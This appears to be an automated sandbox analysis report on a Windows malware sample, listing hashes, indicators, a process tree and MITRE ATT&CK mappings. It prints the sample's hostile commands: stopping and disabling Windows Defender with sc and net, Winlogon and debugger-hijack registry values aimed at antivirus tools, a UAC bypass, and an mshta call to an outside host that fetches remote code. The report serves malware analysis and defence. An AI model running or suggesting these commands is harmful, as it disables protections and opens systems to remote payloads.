Analysis

max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240704-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/07/2024, 20:15

Static task: static1

Behavioral task: behavioral1
  Sample: 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
  Resource: win7-20240704-en

Behavioral task: behavioral2
  Sample: 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
  Resource: win10v2004-20240704-en
General

Target: 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Size: 2.2MB
MD5: 2dab1dbc69f84a8582d118aeb9605c52
SHA1: 6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
SHA256: 13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
SHA512: c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4
SSDEEP: 49152:dRRIZ2dUIPYiiqowvq00p7PiKXTqp/nYi:Lw/IrwzXOp/Yi
Malware Config

Extracted: http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\nrrlgu.exe" | nrrlgu.exe
UAC bypass
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nrrlgu.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | nrrlgu.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | nrrlgu.exe
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe | nrrlgu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe | nrrlgu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe | nrrlgu.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Executes dropped EXE 1 IoCs
pid | Process
3280 | nrrlgu.exe

Checks whether UAC is enabled
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nrrlgu.exe
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4620 | sc.exe
4260 | sc.exe
2692 | sc.exe
2832 | sc.exe
3852 | sc.exe
1916 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
3280 | nrrlgu.exe (this same entry is reported 64 times)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3280 | nrrlgu.exe
Token: SeShutdownPrivilege | 3280 | nrrlgu.exe
Token: SeDebugPrivilege | 3280 | nrrlgu.exe
Token: SeShutdownPrivilege | 3280 | nrrlgu.exe
Suspicious use of FindShellTrayWindow 4 IoCs
pid | Process
3280 | nrrlgu.exe
3280 | nrrlgu.exe
3280 | nrrlgu.exe
3280 | nrrlgu.exe
Suspicious use of WriteProcessMemory 39 IoCs
description | pid | Process | procid_target
(each row below is reported three times in the original, 39 entries in total)
PID 4952 wrote to memory of 3852 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 84
PID 4952 wrote to memory of 1916 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 85
PID 4952 wrote to memory of 3160 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 86
PID 4952 wrote to memory of 4620 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 87
PID 4952 wrote to memory of 3280 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 92
PID 3160 wrote to memory of 244 | 3160 | net.exe | 93
PID 4952 wrote to memory of 4084 | 4952 | 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe | 94
PID 3280 wrote to memory of 2832 | 3280 | nrrlgu.exe | 97
PID 3280 wrote to memory of 2692 | 3280 | nrrlgu.exe | 98
PID 3280 wrote to memory of 2964 | 3280 | nrrlgu.exe | 99
PID 3280 wrote to memory of 4260 | 3280 | nrrlgu.exe | 100
PID 3280 wrote to memory of 4192 | 3280 | nrrlgu.exe | 105
PID 2964 wrote to memory of 1704 | 2964 | net.exe | 106
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | nrrlgu.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nrrlgu.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | nrrlgu.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | nrrlgu.exe
Processes
(process tree; indentation shows parent/child relationships)

C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"
  PID: 4952
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\sc.exe
    Command line: sc stop WinDefend
    PID: 3852
    - Launches sc.exe

  C:\Windows\SysWOW64\sc.exe
    Command line: sc config WinDefend start= disabled
    PID: 1916
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    Command line: net stop msmpsvc
    PID: 3160
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop msmpsvc
      PID: 244

  C:\Windows\SysWOW64\sc.exe
    Command line: sc config msmpsvc start= disabled
    PID: 4620
    - Launches sc.exe

  C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe
    Command line: C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe
    PID: 3280
    - Modifies WinLogon for persistence
    - UAC bypass
    - Event Triggered Execution: Image File Execution Options Injection
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    - System policy modification

    C:\Windows\SysWOW64\sc.exe
      Command line: sc stop WinDefend
      PID: 2832
      - Launches sc.exe

    C:\Windows\SysWOW64\sc.exe
      Command line: sc config WinDefend start= disabled
      PID: 2692
      - Launches sc.exe

    C:\Windows\SysWOW64\net.exe
      Command line: net stop msmpsvc
      PID: 2964
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 stop msmpsvc
        PID: 1704

    C:\Windows\SysWOW64\sc.exe
      Command line: sc config msmpsvc start= disabled
      PID: 4260
      - Launches sc.exe

    C:\Windows\SysWOW64\mshta.exe
      Command line: mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033"
      PID: 4192

  C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2DAB1D~1.EXE" >> NUL
    PID: 4084
Network
MITRE ATT&CK Enterprise v15
(number in parentheses is the count of matching signatures)

Persistence
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)
Downloads

Filesize: 2.2MB
MD5: 2dab1dbc69f84a8582d118aeb9605c52
SHA1: 6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
SHA256: 13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
SHA512: c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4